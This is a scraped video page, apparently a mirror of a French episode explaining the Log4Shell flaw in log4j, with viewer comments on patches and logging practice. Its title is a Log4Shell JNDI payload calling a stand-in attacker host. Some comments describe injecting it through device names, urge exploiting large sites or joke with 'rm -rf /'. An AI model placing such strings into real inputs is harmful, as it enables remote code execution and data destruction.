${jndi:ldap://attacker.com/evil.class}

Подписаться 659 тыс.

Просмотров 152 тыс.

50% 1

Si vous voulez tout comprendre à la faille Log4Shell, vous êtes sur la bonne vidéo 😎
Abonnez-vous : / @underscore_
La cloche est en supplément gratuit.
🎥 Pour encore plus de fraicheur, suivez l'émission en direct : / micode (c'est tous les mercredis à 20h)
🎙 Pour réécouter l'émission en entier, sur votre plateforme préférée : underscore.to
📸 Pour retrouver les meilleurs moments de l'émission : / underscoretalk
🐦 Pour ne rien rater des meilleurs moments : / underscoretalk
👉 Nos invités sont Mathis Hammel & @HardiskTV !
--
Date de l'émission : 15/12/2021
N.B. Nous republions cette vidéo sortie initialement mardi dernier durant 30 minutes, après nous être aperçus d'un mauvais réglage sur nos voix, grâce à vos commentaires ! C'était en effet très désagrable à écouter, on a préféré la supprimer. Merci pour votre vigilence, et désolé pour ça !

Наука

Опубликовано:

22 дек 2021

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист

Посмотреть позже

Комментарии : 238

@Underscore_ 2 года назад

Vous aimez bien notre titre, RU-vid ? 😁

@kilyan.m0v 2 года назад

non.

@pikachute7737 2 года назад

Oui !

@klyanksg 2 года назад

Mdr nn

@hewo.mp4563 2 года назад

@@kilyan.m0v prq? 🤔

@chefmine8242 2 года назад

Vous êtes sérieux.

@sareenza9370 2 года назад

Micode, j'écoute tes podcasts sur Spotify et j'ai un petit commentaire à faire, souvent vous "montrez" des tweets ou autre à l'écran et vous ne les lisez pas du coup quand on écoute le podcast on est complètement sortie du truc. Deuxième chose, les enregistrements que vous passez ont un volume assez faible et difficilement compréhensible. Pour le reste c'est top, bon courage pour vos projets. En espérant que tu tombe sur ce commentaire, je vous souhaite à toute l'équipe un joyeux noël.

@user-gq8rw6hf9v 2 года назад

Faudrait aussi dire d'arrêter les miniatures ultra aguicheuses maintenant qu'ils ont pas mal d'audience

@lightningteam8560 2 года назад

@@user-gq8rw6hf9v La minia est pas aguicheuse, la faille si par exemple elle était dite dans un chat minecraft n'importe qui pouvait taper l'incruste dans ton pc

@sareenza9370 2 года назад

@@user-gq8rw6hf9v après avoir vu les chaînes auxquelles tu es abonné, je trouve ça assez drôle comme remarque.

@launay98 2 года назад

HAHAHAHAHA ça faisait un moment que je l'attendais cette vidéo. Bien content que vous parlez enfin du log4j.

@einkoi 2 года назад

13:38 La version 2.15.0 annoncée n'est pas correcte, la version 2.16.0 était la version patchée mais une nouvelle faille Deny of Service a été détectée sur la 2.16.0 et patchée quelques jours après, il est donc fortement conseillé de migrer en version 2.17.0

@MathisHammel 2 года назад

Elle était correcte au moment de l'émission, mais effectivement c'est 2.17 maintenant 😉

@candriant8401 2 года назад

Oui, il y a un train de retard. La question à 100000 milliards est que c'est fini?? Ça touche tous les constructeurs de soft même les plus grosse AWS, Google cloud, Cisco , antivirus et même firewall...

@sebastiend7028 2 года назад

ou 2.12.3 pour Java 7

@Bananagogo101 2 года назад

La version 2.17.0 dont tu parles ça concerne la plateforme Java 7 ou 8 ou les deux ? Perso j'ai la 8 (8.0.3110.11 pour être précis), que je n'avais pas utilisé depuis bien 2 mois (donc avant la publication de la faille) et après avoir vu la vidéo j'ai donc cherché à faire une mise à jour mais Java me dit que j'ai déjà la version le plus récente, j'ai du louper un truc ? 🤔

@candriant8401 2 года назад

Il y a déjà encore d'autres failles détectées le 28/12.

@jmol828 2 года назад

Petit témoignage, je vis ça de l’intérieur au sein de l’équipe Sécu d’une grande entreprise. Je pense qu’une vidéo sur comment répondre à l’incident pourrait être intéressant (identification, Patching /remediation, protection (waf/firewall) détection (siem))! Bonne continuation

@jacquesdupontd 2 года назад

rm -rf / "au revoir président" avec un slip sur la tête

@thibautsala5211 2 года назад

Pour en venir à poster un commentaire sous une vidéo micode ça doit être bien la merde 😜 j’espère que vous trouverez solution au problème bonne soirée.

@gabberhaze 2 года назад

Il y a la chaine youtube " Pour 1nfo - la Cyber expliquée " qui en parle un peu après je sais si c'est approprié pour une grande entreprise

@JunK27200 2 года назад

Lool l'équipe secu d'une grande entreprise attend un tuto youtube pour répondre à l'incident 😂😂👍👍

@GianniGriot-Fausti 2 года назад

Cette fois c'est bon je réussirai à regarder cette video avant qu'elle soir supprimer 😂

@fredlaf9281 2 года назад

Idem

@anto_phlp 2 года назад

Pareil 😂

@karnalito1337 2 года назад

Pogu

@bertrandperrier 2 года назад

Laquelle a été supprimé ? Pkoi ?

@jfreor 2 года назад

@@bertrandperrier Je me posais aussi la même question… Mais j’imagine que toutes les réponses que tu as eu à cette question ont déjà été supprimées !! 🤣🤣🤣

@laspiiiytb334 2 года назад

Contenu de qualité !!! Continu comme ça! Même si entre nous j ai rien compris ahah c'est super intéressant ahah

@ALFAGamer92 2 года назад

il manque juste un des reseaux des invités dans la description et c'est parfait

@yagi_4048 2 года назад

3:27 "En Java je fais du 'console.log();'." Petit correctif, en Java on fait un : System.out.println(); console.log(); c'est en JavaScript.

@MathisHammel 2 года назад

Mdr oui j'ai été pris dans le feu de l'action, j'ai même fait un tweet à ce sujet 😅 -- Mathis

@yuzbawpsy 2 года назад

Cette chaîne est atypique et je kiff ./

@tomahawks8288 2 года назад

Avec ce titre les vrais savent déjà que ça va parler de la log4j

@pikachute7737 2 года назад

C'étais sur

@einkoi 2 года назад

Surtout qu'ils disent que la faille a été annoncée vendredi dernier mais de nombreux articles en parlent déjà depuis le 13 décembre et de nombreuses entreprises ont déjà corrigé leurs failles depuis le 14-15 (mardi-mercredi), donc pas vraiment d'accord avec la date annoncée.

@DidierLoiseau 2 года назад

@@einkoi la faille a été annoncée le 10, c’est de ce vendredi-là dont ils parlent

@purepix_fr 2 года назад

les faux aussi ! (j'en suis) ^^

@HulkHogan6262 2 года назад

Bah il y a déjà eu Minecraft avec cette faille

@tenchigreed 2 года назад

Merci pour cette vidéo

@ahsteroweed57 2 года назад

Ah enfin de retour

@Survieennature2 2 года назад

Déso je vais pas le regarder une deuxième fois 😂👍

@OnlyWhemy 2 года назад

Y a un moyen de revenir longtemps en arrière et de savoir si quelqu un l'utilisait depuis très longtemps ?

@pokebattle763 Год назад

J'ai eu des tentatives de ce genre sur mes serveurs Minecraft, malheureusement, j'avais déjà eu connaissance de cette faille, et j'avais MAJ un de mes plugin de sécu (ServeurIA) pour patch ce soucie. En gros, si une personne mettez "${" dans le tchat (Par défaut, mais on peut changer facilement la config), la personne est ban, et le message est intercepter (Avant d'être logguer, et avant d'être afficher dans le tchat) En gros, ça ne protège pas que le serveur, mais toutes les personnes connectées.

@spycktwo 2 года назад

Dommage que les replay ne soient pas dispo en full vidéos... je ne suis pas fan du format audio (malentendant...) et c'est clairement une de mes chaines préférées.

@nicolasjaubert6255 2 года назад

Dans les faits, c'est depuis au minimum le 9 décembre que la faille a été révélé au public. Et qui sait si elle a pas été utilisé avant.

@Forbidden176 2 года назад

l'intro est drôle quand on vie la slowly life

@MTSentissi-Dev 2 года назад

Big-Up!

@xproavo5535 2 года назад

Oh oui mathis Hammel je l aime trop ce gars Il a été mon prof de code au Gaming Campus et c est mtn le parrain d une école : Guardia

@MathisHammel 2 года назад

ehe ça fait plaisir merci :p

@julienonnein1237 2 года назад

Je suis d'accord. ça aurait été bien de sortir une release patch bien avant de diffuser la faille

@romaindelahaye7062 2 года назад

le "hè" de la musique de fin m'a matrixé .... maintenant quand j'entend le début de l'outro je suis obligé de karaoker ce petit bruit

@pierreswing9165 2 года назад

Enfin, quand tu es pro tu sais qu'il ne faut jamais faire confiance à ce qui vient de la couche interface. Supprimer les caractères spéciaux des noms d'utilisateurs c'est du basique.

@pcdwarf4787 2 года назад

tout a fait. Déjà à la base un loggeur c'est un truc qui process des données de débuggage donc par définition mal maitrisées. Donc un logeur qui interprête, c'est VRAIMENT chercher la merde ! C'est évident qu'un jour ou l'autre ça se fera péter !

@dcrazygeek0741 2 года назад

@7:00 j'ai vu des gens utiliser git pour ne pas faire de site

@kabal127 2 года назад

Ça a été 7 jours d'enfer au boulot et c'est pas fini...

@calrohel1133 2 года назад

redif ?

@LouisSerieusement 2 года назад

Enfin !

@popoulet 2 года назад

Micode : ce titre est dangereux !!!! Tout le monde : ok je clique 👁👄👁

@stanichu_ 2 года назад

Oh tient, un reupload sauvage !

@adrienschndr 2 года назад

Repost ?

@qwetersss 2 года назад

Ça fonctionne juste sur les sites en java ?

@NatureBricolage 2 года назад

oui

@distil47 2 года назад

C'est quand la prochaine battledev ? ;)

@jarkan8675 2 года назад

Je suis un peu nul en informatique mais je me demande si utiliser son ordinateur au quotidien normalement en utilisant juste une machine virtuelle ne serais pas une barrière imparable ?? Genre en gros des qu'on allume le pc on lance la machine virtuelle, et on joue aux jeux dessus, on navigue sur internet etc... J'ai essayé d'être le plus claire possible haha J'espère que quelqu'un aura une réponse à ma question :) 😘

@JF-hm8bs 2 года назад

Clairement non. Ta machine virtuelle est même plus vulnérable que ton ordinateur. Ça peut être bien à la rigueur si tu veux essayer des trucs qui peuvent mettre en péril l'intégrité de ton OS, mais ça ne protégera pas la fuite de données sensible si sur une utilisation continue.

@nicolasdelduca6759 2 года назад

A quand l'épisode sur la cybersecurite dans nos véhicules ? Car avec cet épisode et - contrairement à la remarque- la présence de mises à jour 'over the air' de nos logiciels embarqués, on pourrait presque se faire du mourron😏

@gabrielsoilihi7064 2 года назад

Le titre???

@ZincTwistFuria 2 года назад

La suite ? Vrm intéressant

@jsebtarot5006 2 года назад

Distro role and release. Il y a que ça .

@Gallia_Christiana 2 года назад

Faut exploiter ce truc sur tout les plus gros sites !! Mdr c’est de la bombe je vais passé ma semaine dessus là 😂😂

@shaft8469 2 года назад

J’ai une impression de déjà vue O_o

@Underscore_ 2 года назад

😇

@bobshyne 2 года назад

Slt j'ai réussi l'utiliser sur un serv virtuel et bas ca marche très bien par contre apparemment c est utilisable une fois sauf si on peu reboot la machine et biensur sauf erreur de ma part ^)

@salegossesiuuu 2 года назад

Hahahaa le titre, j'ai direct la ref

@_duck-noris_7738 2 года назад

Mais donc quand on a cliquer sur la vidéo on c pas fait hacker ?

@fabricemenoud3296 2 года назад

Elle a été supprimé, mais elle est de retour, peut être du au titre 🤣

@xvatorOwix 2 года назад

incroyable mec

@jules_________ 2 года назад

Pour les joueurs Minecraft vous inquiétez pas la faille a été patch

@nicejungle 2 года назад

Ce titre trollesque, j'aime ❤

@lrzbike4282 2 года назад

J'ai pas compris le but?

@Gokaides Год назад

A CHAQUE FOIS que je lance une video d'underscore parce que le sujet m'intéresse, je pars au bout de 2 minutes car le son est si faible que je suis obligé d'enfoncer mon casque dans mes oreilles pour bien entendre si y'a un peu de bruit autour (genre la bouilloire...) Sans deconner c'est un sketch... c'est si difficile de booster le volume ? genre de le mettre 10 fois plus fort ? J'ai jamais le son a fond SAUF pour les video d'underscore et je ma barre quand même car ça reste trop faible...

@xxathyx9050 2 года назад

T'es un micode 2.0 toi?

@remymoro1854 2 года назад

Beacon Bluetooth. Justa avoir un peu plus d'informations.

@jeangervasi 2 года назад

Tu changé le nom de ton téléphone et tu lui donne comme nom la fameuse chaîne de caractères. Les appareils a proximité qui scan en continu le bluetooth vont voir ton téléphone, récup son nom et peu être là log, et a ce moment là la faille peut être exploitée. Même chose donc si tu fait un partage de connexion wifi et que qqc de non patché scan les réseau wifi a proximité et log les nom

@remymoro1854 2 года назад

Merci, pour cette réponse précise :)

@jujugaming686 2 года назад

Tu m'as fais peur !!!!

@ClaudyFlux 2 года назад

Pas compris la dif entre log4j et log4shell?

@daaa57150 2 года назад

log4j c'est la lib de logging, log4shell c'est le nom donné à la vulnérabilité

@MrNiuxe 2 года назад

3:25 : "en java, je fais console.log()" ==> il est bon lui..... 😂 (heureusement qu'il est classé dans le top 100)

@RobinBiechy 2 года назад

j'ai aussi relevé, vive la confusion entre Java et JavaScript x) Après sur le reste il est très bon, même les pro font des erreurs ^^

@MathisHammel 2 года назад

Ouais dsl je suis team Python ahah

@MrNiuxe 2 года назад

@@MathisHammel En python, il y a print et l'objet Log (de la std).... En aucun cas, il y a console.log (réservé au JS) .... Bien que je ne connaisse pas bien le Java, c'est System.out.println(params). Java et Javascript ==> rien à voir !

@florian5804 2 года назад

Il s'est trompé sur ca, mais sinon jpense qu'il a 100x ton lvl

@MrNiuxe 2 года назад

@@florian5804 🤣🤣🤣 le mec raconte des conneries et il a 100x mon level. Passe chez BFMTV, tu as tes chances en tant qu'expert ! si si je t'assure.

@Adam-bf9zz 2 года назад

3:28 ?

@NatureBricolage 2 года назад

J'ai laissé un commentaire sur une erreur visible sur le sceen à 5:53 mais il est systématiquement retiré. Dommage...

@solidsteak02 2 года назад

La vraie question: pourquoi cette vidéo est apparue 10 minutes dans mon thread il y a deux jours?

@codeurdenuit8783 2 года назад

Une star des hackathons. XD

@barthpaleologue 2 года назад

La vidéo la plus difficile à trouver avec un moteur de recherche mdr

@TheBlackManMythLegend 2 года назад

ou pas

@xvatorOwix 2 года назад

goo

@ethanserpolet2400 2 года назад

J'ai testé ça marche pas

@Saens406 2 года назад

ça existe depuis la nuit des temps ce genre de vulnérabilité. Comment un truc aussi gros que log4j peut pas avoir patch ça?

@LouisSerieusement 2 года назад

c'est des bénévoles

@kabal127 2 года назад

Parceque personne n'utilise ce lookup ... Mais le mec qui a implémenté une telle connerie et les mecs qui ont review ce code j'aimerais tellement voir leur tête au l'heure actuelle

@einkoi 2 года назад

La vulnérabilité est exploitable seulement dans certaines conditions, comme ils le disent dans la vidéo, il faut logger des entrées utilisateur, mais il y a également des sécurités en passant des arguments à la Java Virtual Machine (JVM) pour limiter le risque dans un premier temps, certaines implémentations spécifiques des Appender permettent les exploits de cette faille également.

@justzarkolys.3649 2 года назад

Aussi parceque de grosses boîtes ont utilisé pendant des années la lib sans jamais donner un centime aux devs. Ce sont des bénévoles pas des magiciens peut être qu'avec plus de moyen la vuln aurait été patché avant

@kabal127 2 года назад

@@justzarkolys.3649 Une lib Open Source c'est justement fait pour être utilisée par les entreprises... Je ne comprends pas ta réponse. Tu parles de quels devs ?

@colomban2754 2 года назад

Concrètement elle fait quoi cette ligne de code ?

@kabal127 2 года назад

Ça dépend de l'URL du serveur. En gros si ton logger log4j fait un lookup sur cette string il va exécuter n'importe quel code qui sera hoste et injecté via cette URL...

@kabal127 2 года назад

A partir de maintenant la règle simple qui stipule qu'il ne faut JAMAIS logger directement les entrées utilisateur prend tout son sens 😉

@colomban2754 2 года назад

@@kabal127 Un lookup ?

@tesseract_3130 2 года назад

Dans ce cas là elle va télécharger et exécuter ce qui se trouve à cette URL

@atsura1611 2 года назад

Il est vrai qu'il a confondu le console.log du js et le sout mais n'en faite pas tout un plat amis dev, ça arrive :)

@nillemcaldin1698 2 года назад

Je passes littéralement plusieurs heure pas jours sur codingame !!!

@zZInFiNitYz 2 года назад

Mais à la base cette fonctionnalité servait à quoi ?

@johand6407 2 года назад

a appeler

@pcdwarf4787 2 года назад

interpréter les logs ? bah j'avoue que je ne vous pas bien à quoi ça peut servir d'autre que de créer un risque. C'est comme de marcher sur un fil. C'est pas très utile mais c'est fun et c'est possible... Sauf qu'un jour ou l'autre, tu tombes... C'est pour ça qu'il vaut mieux pas le faire si tu tiens à la vie...

@HulkHogan6262 2 года назад

Bah super j'ai été piraté puisque les appli Android sont dev en Java

@polochon-jh9ke 2 года назад

Les vrais on déjà vue

@bibifire8334 2 года назад

Mais what en Java c’est pas console.log(); c’est System.out.println(); mdrrrr 😂😂

@no-tf9de 2 года назад

javascript il s’est tromper

@rexracer3005 2 года назад

Avec nos serv web et apache on est atteint par la faille :| tout les Servs web apache sont exposés

@NyleorV 2 года назад

En gros c'est une simple faille XSS, ça fait 20 ans qu'on est ultra sensibilisé à ça, comment en 2021 il peut encore exister des failles pareilles. Faut reprendre les bases là, allez hop on retourne prendre ses marques sur PHP.

@FifiPilote 2 года назад

Xss

@NyleorV 2 года назад

@@FifiPilote 🙊

@FifiPilote 2 года назад

@@NyleorV klutch kickers 👋 gueule

@atol71 2 года назад

Pas encore de réponse d'Oracle...

@rodolphebobby4537 2 года назад

Vigilance aussi sur *vigilence* ....

@barangeouse5912 2 года назад

What le titre ??

@g-netx1668 2 года назад

Faut get la vidéo

@IronMechanic7110 2 года назад

Seul les vrais on compris d'un coup.

@dhoxoya5791 2 года назад

Les vidéos son trop courte a mon goût

@only_slaze 2 года назад

Ducoup on peut se faire acker en bedrock?

@yannotk 2 года назад

non... en Java uniquement du coup, bedrock est fait en c++

@XPXWORD 2 года назад

G fait sa sur hypixel

@googlee6028 2 года назад

T'sais c'est illégal t'aurai pu te faire poursuivre par hypixel

@arnaudFbr 2 года назад

@@googlee6028 c'est non seulement illégal mais surtout archi inutile puisque hypixel avaient leur log4j configuré d'une manière vraiment particulière (pour être exécuté sur tous les serveurs dans la meme instance) qui fait que ca a jamais marche sur hp

@jpouly 2 года назад

Je comprend pas pourquoi un logger peut accéder au ldap. C'est une fonctionnalité qui n'a aucun sens pour moi.

@pcdwarf4787 2 года назад

un loggeur qui interprête ? WTF ?! ça s'apelle chercher la merde ! bon bah c'est normal que ça soit pété !

@chvrogoldo8973 2 года назад

C’est quoi ce titre wshh😂

@polochon-jh9ke 2 года назад

Déjà publiée mdrrr

@MaxFri2109 2 года назад

pantalon rouge, chaussettes orange ? Sérieux ? ^^

@MathisHammel 2 года назад

Je m'étais réveillé tôt ahah 😭

@SeboxFX 2 года назад

On dirait je suis le premier !

@Pinocchio426 Год назад

Moi c'est l'inverse je préfère les vidéos longues !!

@pourlecole5396 2 года назад

Je reregarde pas sorry

@LuCryptoFR 2 года назад

Micode qui a pas voulu prendre parti sur le pass sanitaire AHAHAHH

@wasab2498 2 года назад

Second

@Bacabab 2 года назад

Bah j'avais pas louper grand chose.

@Survieennature2 2 года назад

First

@Skoiyo 2 года назад

Minecraft à été en feu pendant qlq jours à cause de cela :/

@cedricbellegarde3114 2 года назад

Cette faille montre surtout en 2021 le manque de compétence de certains sysadmin... On répétera jamais assez qu'un serveur de doit pas avoir accès à Internet! Un pare feu, ça se configure en entrée mais surtout en sortie! Si le serveur est correctement configuré, la faille ne sert à rien...

@MarOwN 2 года назад

Pas toujours applicable… la configuration des sorties ne change pas grand chose au problème, la machine peut être infectée du moment que la machine est joignable depuis l’extérieur, nécessaire dans certains cas. Au mieux bloquer les communications sortante permet d’éviter la propagation sur le réseau tout entier

@cedricbellegarde3114 2 года назад

@@MarOwN Je ne pense pas, si le serveur ne peut télécharger la classe Java via ldap:// il se passera rien et le serveur ne sera pas infecté...

@cedricbellegarde3114 2 года назад

C'est d'ailleurs la base pour bloquer toutes les tentatives de reverse shell sur un serveur web.

@kochka22 2 года назад

C'est exactement ce que je me suis dit en écoutant l'exposé de la faille et je ne suis pas sysops... Comme faire tourner des services en root...

@abellematheux7632 2 года назад

Waouh, la faille est tellement conne qu'on comprend en ayant un niveau archi-basique !

@wyksy8383 2 года назад

Donc si je comprends qu'elle qu'un peut rentrer ça sur un serveur Minecraft et tout le monde va potentiellement télécharger un virus qui récupère CB et tout ? Mdr

@ze_reaper 2 года назад

Bah de ce que j'ai compris tu peux faire télécharger depuis un url sur un serveur un fichier qui sera automatiquement executé par Java par la suite, donc tu peux faire un peu tout ce que tu veux ensuite si le fichier executé te conserve une porte d'accès à l'appreil ^^'

@njjuiooiopop6851 2 года назад

Minecraft a sorti très vite des patchs après la découverte de log4shell

@stuntman25380 2 года назад

oui oui c'est exploité .... rip la badgeuse

@Largoat 2 года назад

Franchement ... jndi:ldap .. ça date de 2016 ! => ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-Y8a5nB-vy78.html Feraient-ils exprès .

@annettetriple2 2 года назад

Ptdr c'est quoi se titre à la con 😂

@g-netx1668 2 года назад

Tu as regardé la vidéo ?

@annettetriple2 2 года назад

@@g-netx1668 oue oue tkt

@joffrey00_off 2 года назад

Les gens jouent pas en Bedrock sur Minecraft tout le monde joue en Java mdrrr

@gogowshagenai6139 2 года назад

Les joueurs qui l'ont découvert sur minecraft viennent d'ailleurs du pire serveurs j'ai nommé 2b2tet certains on même récupérer des données d'utilisateurs c'est aller assez loin d'ailleurs

@Saens406 2 года назад

c'est vraiment de la merde log4j, comment on peut massivement utilisé un logger qui fait pas la diff entre un user name random et un ${date}

@charakiga 2 года назад

Bah tout le monde se disait: « bwouarf, ça va, c’est un peu chiant mais rien de grave peut arriver, ${date}, et alors? Il me donne la date? ». Mais bon ils avaient pas compris l’ampleur de la faille.

@Saens406 2 года назад

@@charakiga ça fait des lustres que ce genre d'exploit existe.

@charakiga 2 года назад

@@Saens406 Merci ils l’ont dit dans la vidéo.

@joeguilian2829 2 года назад

La bonne vieille injection à la php, je suis mort de rire. Est-ce que votre invité peut nous parler du langage nodejs, si apprécié par les jeunes gens, et qui est une faille en lui même ?